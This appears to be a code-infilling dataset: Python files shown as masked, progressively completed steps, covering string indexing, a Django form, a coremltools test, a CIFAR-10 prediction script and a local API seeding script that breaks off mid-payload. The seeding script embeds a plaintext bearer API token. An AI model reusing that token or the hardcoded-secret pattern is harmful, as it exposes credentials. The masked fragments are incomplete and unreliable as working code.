{ "blob_id": "7262d7a82834b38762616a30d4eac38078e4b616", "index": 6724, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(str01[3])\nprint(str01[1])\n<mask token>\nprint(l01)\n<mask token>\nwhile i <= index_last:\n print(str01[i])\n i += 1\nprint()\nprint('上面的循环结束了 执行到这里')\n<mask token>\n", "step-3": "str01 = '大发放而非asdfasfasdfa,,,,aadfa阿斯顿发水电费&&'\na = str01[3]\nprint(str01[3])\nprint(str01[1])\nl01 = len(str01)\nprint(l01)\nstr01 = '大放而非asdfasfasdfa,,,,aadfa阿斯顿发水电费&&'\nlen01 = len(str01)\nindex_last = len01 - 1\ni = 0\nwhile i <= index_last:\n print(str01[i])\n i += 1\nprint()\nprint('上面的循环结束了 执行到这里')\n<mask token>\n", "step-4": "# 遍历(循环) 出字符串中的每一个元素\r\nstr01 = \"大发放而非asdfasfasdfa,,,,aadfa阿斯顿发水电费&&\"\r\n\r\n\r\n# ----->字符串中的元素都是有索引的,根据索引可以得到对应的元素\r\n# 而---3\r\na = str01[3]\r\nprint(str01[3])\r\n\r\n# 发---1\r\nprint(str01[1])\r\n\r\n#---->计算字符串的长度\r\n# 这个字符串中 有 35个元素 ,长度是35\r\nl01 = len(str01)\r\nprint(l01)\r\n\r\n\r\n\r\nstr01 = \"大放而非asdfasfasdfa,,,,aadfa阿斯顿发水电费&&\"\r\n# 最后一个元素的索引:字符串的长度-1\r\n\r\nlen01 = len(str01)# 字符串的长度\r\nindex_last = len01 - 1 # 最后一个元素的索引\r\ni = 0 # i变量表示是 元素的索引\r\n\r\nwhile i <= index_last:\r\n print(str01[i])\r\n i += 1\r\n\r\nprint()\r\nprint(\"上面的循环结束了 执行到这里\")\r\n\r\n\r\n'''\r\n 0 1 2 ..... 34\r\n \r\n\r\n'''\r\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
from django import forms class TeacherForm(forms.Form): name = forms.CharField(label='Your Name', max_length=100, widget=forms. TextInput(attrs={'class': 'form-control text-center w-75 mx-auto'})) email = forms.EmailField(widget=forms.TextInput(attrs={'class': 'form-control text-center w-75 mx-auto'}))
normal
{ "blob_id": "7c5877eea78c3fa8b7928219edd52e2502c16c09", "index": 6392, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass TeacherForm(forms.Form):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass TeacherForm(forms.Form):\n name = forms.CharField(label='Your Name', max_length=100, widget=forms.\n TextInput(attrs={'class': 'form-control text-center w-75 mx-auto'}))\n email = forms.EmailField(widget=forms.TextInput(attrs={'class':\n 'form-control text-center w-75 mx-auto'}))\n", "step-4": "from django import forms\n\n\nclass TeacherForm(forms.Form):\n name = forms.CharField(label='Your Name', max_length=100, widget=forms.\n TextInput(attrs={'class': 'form-control text-center w-75 mx-auto'}))\n email = forms.EmailField(widget=forms.TextInput(attrs={'class':\n 'form-control text-center w-75 mx-auto'}))\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# Copyright (c) 2017, Apple Inc. All rights reserved. # # Use of this source code is governed by a BSD-3-clause license that can be # found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause import unittest from distutils.version import StrictVersion import numpy as np from coremltools._deps import _HAS_SKLEARN, _SKLEARN_VERSION if _HAS_SKLEARN: import sklearn from coremltools.converters import sklearn as converter try: # scikit-learn >= 0.21 from sklearn.impute import SimpleImputer as Imputer sklearn_class = sklearn.impute.SimpleImputer except ImportError: # scikit-learn < 0.21 from sklearn.preprocessing import Imputer sklearn_class = sklearn.preprocessing.Imputer @unittest.skipIf(not _HAS_SKLEARN, "Missing sklearn. Skipping tests.") class ImputerTestCase(unittest.TestCase): """ Unit test class for testing scikit-learn converter. """ @classmethod def setUpClass(self): """ Set up the unit test by loading the dataset and training a model. """ from sklearn.datasets import load_boston scikit_data = load_boston() # axis parameter deprecated in SimpleImputer >= 0.22. which now imputes # only along columns as desired here. if _SKLEARN_VERSION >= StrictVersion("0.22"): scikit_model = Imputer(strategy="most_frequent") else: scikit_model = Imputer(strategy="most_frequent", axis=0) scikit_data["data"][1, 8] = np.NaN input_data = scikit_data["data"][:, 8].reshape(-1, 1) scikit_model.fit(input_data, scikit_data["target"]) # Save the data and the model self.scikit_data = scikit_data self.scikit_model = scikit_model def test_conversion(self): spec = converter.convert(self.scikit_model, "data", "out").get_spec() self.assertIsNotNone(spec) # Test the model class self.assertIsNotNone(spec.description) # Test the interface self.assertTrue(spec.pipeline.models[-1].HasField("imputer")) def test_conversion_bad_inputs(self): # Error on converting an untrained model with self.assertRaises(Exception): model = Imputer() spec = converter.convert(model, "data", "out") # Check the expected class during covnersion. with self.assertRaises(Exception): from sklearn.linear_model import LinearRegression model = LinearRegression() spec = converter.convert(model, "data", "out")
normal
{ "blob_id": "d3d90b8ccd0ec449c84ac0316c429b33353f4518", "index": 8900, "step-1": "<mask token>\n\n\n@unittest.skipIf(not _HAS_SKLEARN, 'Missing sklearn. Skipping tests.')\nclass ImputerTestCase(unittest.TestCase):\n <mask token>\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n scikit_data = load_boston()\n if _SKLEARN_VERSION >= StrictVersion('0.22'):\n scikit_model = Imputer(strategy='most_frequent')\n else:\n scikit_model = Imputer(strategy='most_frequent', axis=0)\n scikit_data['data'][1, 8] = np.NaN\n input_data = scikit_data['data'][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data['target'])\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, 'data', 'out').get_spec()\n self.assertIsNotNone(spec)\n self.assertIsNotNone(spec.description)\n self.assertTrue(spec.pipeline.models[-1].HasField('imputer'))\n\n def test_conversion_bad_inputs(self):\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, 'data', 'out')\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\n spec = converter.convert(model, 'data', 'out')\n", "step-2": "<mask token>\n\n\n@unittest.skipIf(not _HAS_SKLEARN, 'Missing sklearn. Skipping tests.')\nclass ImputerTestCase(unittest.TestCase):\n \"\"\"\n Unit test class for testing scikit-learn converter.\n \"\"\"\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n scikit_data = load_boston()\n if _SKLEARN_VERSION >= StrictVersion('0.22'):\n scikit_model = Imputer(strategy='most_frequent')\n else:\n scikit_model = Imputer(strategy='most_frequent', axis=0)\n scikit_data['data'][1, 8] = np.NaN\n input_data = scikit_data['data'][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data['target'])\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, 'data', 'out').get_spec()\n self.assertIsNotNone(spec)\n self.assertIsNotNone(spec.description)\n self.assertTrue(spec.pipeline.models[-1].HasField('imputer'))\n\n def test_conversion_bad_inputs(self):\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, 'data', 'out')\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\n spec = converter.convert(model, 'data', 'out')\n", "step-3": "<mask token>\nif _HAS_SKLEARN:\n import sklearn\n from coremltools.converters import sklearn as converter\n try:\n from sklearn.impute import SimpleImputer as Imputer\n sklearn_class = sklearn.impute.SimpleImputer\n except ImportError:\n from sklearn.preprocessing import Imputer\n sklearn_class = sklearn.preprocessing.Imputer\n\n\n@unittest.skipIf(not _HAS_SKLEARN, 'Missing sklearn. Skipping tests.')\nclass ImputerTestCase(unittest.TestCase):\n \"\"\"\n Unit test class for testing scikit-learn converter.\n \"\"\"\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n scikit_data = load_boston()\n if _SKLEARN_VERSION >= StrictVersion('0.22'):\n scikit_model = Imputer(strategy='most_frequent')\n else:\n scikit_model = Imputer(strategy='most_frequent', axis=0)\n scikit_data['data'][1, 8] = np.NaN\n input_data = scikit_data['data'][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data['target'])\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, 'data', 'out').get_spec()\n self.assertIsNotNone(spec)\n self.assertIsNotNone(spec.description)\n self.assertTrue(spec.pipeline.models[-1].HasField('imputer'))\n\n def test_conversion_bad_inputs(self):\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, 'data', 'out')\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\n spec = converter.convert(model, 'data', 'out')\n", "step-4": "import unittest\nfrom distutils.version import StrictVersion\nimport numpy as np\nfrom coremltools._deps import _HAS_SKLEARN, _SKLEARN_VERSION\nif _HAS_SKLEARN:\n import sklearn\n from coremltools.converters import sklearn as converter\n try:\n from sklearn.impute import SimpleImputer as Imputer\n sklearn_class = sklearn.impute.SimpleImputer\n except ImportError:\n from sklearn.preprocessing import Imputer\n sklearn_class = sklearn.preprocessing.Imputer\n\n\n@unittest.skipIf(not _HAS_SKLEARN, 'Missing sklearn. Skipping tests.')\nclass ImputerTestCase(unittest.TestCase):\n \"\"\"\n Unit test class for testing scikit-learn converter.\n \"\"\"\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n scikit_data = load_boston()\n if _SKLEARN_VERSION >= StrictVersion('0.22'):\n scikit_model = Imputer(strategy='most_frequent')\n else:\n scikit_model = Imputer(strategy='most_frequent', axis=0)\n scikit_data['data'][1, 8] = np.NaN\n input_data = scikit_data['data'][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data['target'])\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, 'data', 'out').get_spec()\n self.assertIsNotNone(spec)\n self.assertIsNotNone(spec.description)\n self.assertTrue(spec.pipeline.models[-1].HasField('imputer'))\n\n def test_conversion_bad_inputs(self):\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, 'data', 'out')\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\n spec = converter.convert(model, 'data', 'out')\n", "step-5": "# Copyright (c) 2017, Apple Inc. All rights reserved.\n#\n# Use of this source code is governed by a BSD-3-clause license that can be\n# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause\n\nimport unittest\nfrom distutils.version import StrictVersion\n\nimport numpy as np\n\nfrom coremltools._deps import _HAS_SKLEARN, _SKLEARN_VERSION\n\nif _HAS_SKLEARN:\n import sklearn\n\n from coremltools.converters import sklearn as converter\n try:\n # scikit-learn >= 0.21\n from sklearn.impute import SimpleImputer as Imputer\n\n sklearn_class = sklearn.impute.SimpleImputer\n except ImportError:\n # scikit-learn < 0.21\n from sklearn.preprocessing import Imputer\n\n sklearn_class = sklearn.preprocessing.Imputer\n\n@unittest.skipIf(not _HAS_SKLEARN, \"Missing sklearn. Skipping tests.\")\nclass ImputerTestCase(unittest.TestCase):\n \"\"\"\n Unit test class for testing scikit-learn converter.\n \"\"\"\n\n @classmethod\n def setUpClass(self):\n \"\"\"\n Set up the unit test by loading the dataset and training a model.\n \"\"\"\n from sklearn.datasets import load_boston\n\n scikit_data = load_boston()\n # axis parameter deprecated in SimpleImputer >= 0.22. which now imputes\n # only along columns as desired here.\n if _SKLEARN_VERSION >= StrictVersion(\"0.22\"):\n scikit_model = Imputer(strategy=\"most_frequent\")\n else:\n scikit_model = Imputer(strategy=\"most_frequent\", axis=0)\n scikit_data[\"data\"][1, 8] = np.NaN\n\n input_data = scikit_data[\"data\"][:, 8].reshape(-1, 1)\n scikit_model.fit(input_data, scikit_data[\"target\"])\n\n # Save the data and the model\n self.scikit_data = scikit_data\n self.scikit_model = scikit_model\n\n def test_conversion(self):\n spec = converter.convert(self.scikit_model, \"data\", \"out\").get_spec()\n self.assertIsNotNone(spec)\n\n # Test the model class\n self.assertIsNotNone(spec.description)\n\n # Test the interface\n self.assertTrue(spec.pipeline.models[-1].HasField(\"imputer\"))\n\n def test_conversion_bad_inputs(self):\n # Error on converting an untrained model\n with self.assertRaises(Exception):\n model = Imputer()\n spec = converter.convert(model, \"data\", \"out\")\n\n # Check the expected class during covnersion.\n with self.assertRaises(Exception):\n from sklearn.linear_model import LinearRegression\n\n model = LinearRegression()\n spec = converter.convert(model, \"data\", \"out\")\n", "step-ids": [ 4, 5, 6, 7, 8 ] }
[ 4, 5, 6, 7, 8 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> for i in arr: img = cv2.imread(i) img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) img = cv2.resize(img, (32, 32)) img = img_to_array(img) img = np.expand_dims(img, axis=0) k = model.predict(img)[0] k = np.argmax(k) result.append(class_names[k]) print(i) <|reserved_special_token_0|> df.to_csv( 'E:\\AI Application Implementation\\trained_model\\Classification\\Cifar-10\\sub.csv' , index=False) <|reserved_special_token_1|> <|reserved_special_token_0|> model = load_model( 'E:/AI Application Implementation/trained_model/Classification/Cifar-10/cifar-2.h5' ) class_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'] arr = os.listdir() result = [] for i in arr: img = cv2.imread(i) img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) img = cv2.resize(img, (32, 32)) img = img_to_array(img) img = np.expand_dims(img, axis=0) k = model.predict(img)[0] k = np.argmax(k) result.append(class_names[k]) print(i) dict = {'filename': arr, 'label': result} <|reserved_special_token_0|> df = pd.DataFrame(dict) df.to_csv( 'E:\\AI Application Implementation\\trained_model\\Classification\\Cifar-10\\sub.csv' , index=False) <|reserved_special_token_1|> <|reserved_special_token_0|> from tensorflow.keras.models import load_model import cv2 import os from tensorflow.keras.preprocessing.image import img_to_array import numpy as np model = load_model( 'E:/AI Application Implementation/trained_model/Classification/Cifar-10/cifar-2.h5' ) class_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'] arr = os.listdir() result = [] for i in arr: img = cv2.imread(i) img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) img = cv2.resize(img, (32, 32)) img = img_to_array(img) img = np.expand_dims(img, axis=0) k = model.predict(img)[0] k = np.argmax(k) result.append(class_names[k]) print(i) dict = {'filename': arr, 'label': result} import pandas as pd df = pd.DataFrame(dict) df.to_csv( 'E:\\AI Application Implementation\\trained_model\\Classification\\Cifar-10\\sub.csv' , index=False) <|reserved_special_token_1|> # -*- coding: utf-8 -*- """ Created on Wed Aug 19 05:29:19 2020 @author: Gaurav """ from tensorflow.keras.models import load_model import cv2 import os from tensorflow.keras.preprocessing.image import img_to_array import numpy as np model=load_model('E:/AI Application Implementation/trained_model/Classification/Cifar-10/cifar-2.h5') class_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'] # img = cv2.imread("00004_test.png") # img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # img = cv2.resize(img, (32, 32)) # img = img_to_array(img) # img = np.expand_dims(img, axis=0) # k = model.predict(img)[0] # k=np.argmax(k) # print(class_names[k]) arr = os.listdir() result=[] for i in arr: img = cv2.imread(i) img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) img = cv2.resize(img, (32, 32)) img = img_to_array(img) img = np.expand_dims(img, axis=0) k = model.predict(img)[0] k=np.argmax(k) result.append(class_names[k]) print(i) dict={"filename":arr,'label':result} import pandas as pd df=pd.DataFrame(dict) df.to_csv(r"E:\AI Application Implementation\trained_model\Classification\Cifar-10\sub.csv",index=False) # df=pd.read_csv("E:/AI Application Implementation/trained_model/Classification/Cifar-10/sub.csv") # df.to_csv(r"E:\AI Application Implementation\trained_model\Classification\Cifar-10\sub.csv",index=False)
flexible
{ "blob_id": "c3e2bd635a7ff558ed56e7fb35e8b10e1c660c88", "index": 6804, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor i in arr:\n img = cv2.imread(i)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = cv2.resize(img, (32, 32))\n img = img_to_array(img)\n img = np.expand_dims(img, axis=0)\n k = model.predict(img)[0]\n k = np.argmax(k)\n result.append(class_names[k])\n print(i)\n<mask token>\ndf.to_csv(\n 'E:\\\\AI Application Implementation\\\\trained_model\\\\Classification\\\\Cifar-10\\\\sub.csv'\n , index=False)\n", "step-3": "<mask token>\nmodel = load_model(\n 'E:/AI Application Implementation/trained_model/Classification/Cifar-10/cifar-2.h5'\n )\nclass_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog',\n 'frog', 'horse', 'ship', 'truck']\narr = os.listdir()\nresult = []\nfor i in arr:\n img = cv2.imread(i)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = cv2.resize(img, (32, 32))\n img = img_to_array(img)\n img = np.expand_dims(img, axis=0)\n k = model.predict(img)[0]\n k = np.argmax(k)\n result.append(class_names[k])\n print(i)\ndict = {'filename': arr, 'label': result}\n<mask token>\ndf = pd.DataFrame(dict)\ndf.to_csv(\n 'E:\\\\AI Application Implementation\\\\trained_model\\\\Classification\\\\Cifar-10\\\\sub.csv'\n , index=False)\n", "step-4": "<mask token>\nfrom tensorflow.keras.models import load_model\nimport cv2\nimport os\nfrom tensorflow.keras.preprocessing.image import img_to_array\nimport numpy as np\nmodel = load_model(\n 'E:/AI Application Implementation/trained_model/Classification/Cifar-10/cifar-2.h5'\n )\nclass_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog',\n 'frog', 'horse', 'ship', 'truck']\narr = os.listdir()\nresult = []\nfor i in arr:\n img = cv2.imread(i)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = cv2.resize(img, (32, 32))\n img = img_to_array(img)\n img = np.expand_dims(img, axis=0)\n k = model.predict(img)[0]\n k = np.argmax(k)\n result.append(class_names[k])\n print(i)\ndict = {'filename': arr, 'label': result}\nimport pandas as pd\ndf = pd.DataFrame(dict)\ndf.to_csv(\n 'E:\\\\AI Application Implementation\\\\trained_model\\\\Classification\\\\Cifar-10\\\\sub.csv'\n , index=False)\n", "step-5": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Aug 19 05:29:19 2020\r\n\r\n@author: Gaurav\r\n\"\"\"\r\nfrom tensorflow.keras.models import load_model\r\nimport cv2\r\nimport os\r\nfrom tensorflow.keras.preprocessing.image import img_to_array\r\nimport numpy as np\r\n\r\nmodel=load_model('E:/AI Application Implementation/trained_model/Classification/Cifar-10/cifar-2.h5')\r\n\r\nclass_names = ['airplane', 'automobile', 'bird', 'cat', 'deer',\r\n 'dog', 'frog', 'horse', 'ship', 'truck']\r\n\r\n# img = cv2.imread(\"00004_test.png\")\r\n# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n# img = cv2.resize(img, (32, 32))\r\n# img = img_to_array(img)\r\n# img = np.expand_dims(img, axis=0)\r\n# k = model.predict(img)[0]\r\n# k=np.argmax(k)\r\n# print(class_names[k])\r\n\r\narr = os.listdir()\r\nresult=[]\r\nfor i in arr:\r\n img = cv2.imread(i)\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n img = cv2.resize(img, (32, 32))\r\n img = img_to_array(img)\r\n img = np.expand_dims(img, axis=0)\r\n k = model.predict(img)[0]\r\n k=np.argmax(k)\r\n result.append(class_names[k])\r\n print(i)\r\n \r\n \r\ndict={\"filename\":arr,'label':result}\r\nimport pandas as pd\r\ndf=pd.DataFrame(dict)\r\ndf.to_csv(r\"E:\\AI Application Implementation\\trained_model\\Classification\\Cifar-10\\sub.csv\",index=False)\r\n\r\n# df=pd.read_csv(\"E:/AI Application Implementation/trained_model/Classification/Cifar-10/sub.csv\")\r\n# df.to_csv(r\"E:\\AI Application Implementation\\trained_model\\Classification\\Cifar-10\\sub.csv\",index=False)\r\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> conn.request('POST', '/api/v1/testsuites', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testsuites', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testsuites', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testsuites', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testsuites', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_0|> conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_1|> <|reserved_special_token_0|> host = 'localhost:8000' api_token = 'fuukp8LhdxxwoVdtJu5K8LQtpTods8ddLMq66wSUFXGsqJKpmJAa1YyqkHN3' conn = http.client.HTTPConnection(host) headers = {'authorization': 'Bearer ' + api_token, 'content-type': 'application/json', 'cache-control': 'no-cache', 'postman-token': '44709a5c-ca4a-bbce-4b24-f0632a29bde4'} payload = """{ "Name": "Create and edit project" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "Name": "Create and edit requirement" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Not selected project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Create project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Create project without name" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Check if overview contains project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 1, "Name": "Edit project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Create project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Create requirement" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Create requirement without name" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Overview contains requirement" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Edit requirement" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 2, "Name": "Cover requirement" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "Name": "Create and edit TestSuites and TestCase" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test suite" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test suite without name" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Check if overview contains suite" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Edit test suite" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test case without details" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test case with details" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test case without name" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Check if overview contains case" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Edit test case" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "Name": "Create test set and run" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create set" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Overview contains set" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create set without name" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create set without tests" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Edit test set" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create test run" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Overview contains run" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Execute contains tests" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "Name": "Registration and log test" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 5, "Name": "Redirect to login page" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 5, "Name": "Registration" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 5, "Name": "Registrate same user" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 5, "Name": "Log and logout" }""" conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_1|> import http.client host = 'localhost:8000' api_token = 'fuukp8LhdxxwoVdtJu5K8LQtpTods8ddLMq66wSUFXGsqJKpmJAa1YyqkHN3' conn = http.client.HTTPConnection(host) headers = {'authorization': 'Bearer ' + api_token, 'content-type': 'application/json', 'cache-control': 'no-cache', 'postman-token': '44709a5c-ca4a-bbce-4b24-f0632a29bde4'} payload = """{ "Name": "Create and edit project" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = conn.getresponse() data = res.read() payload = """{ 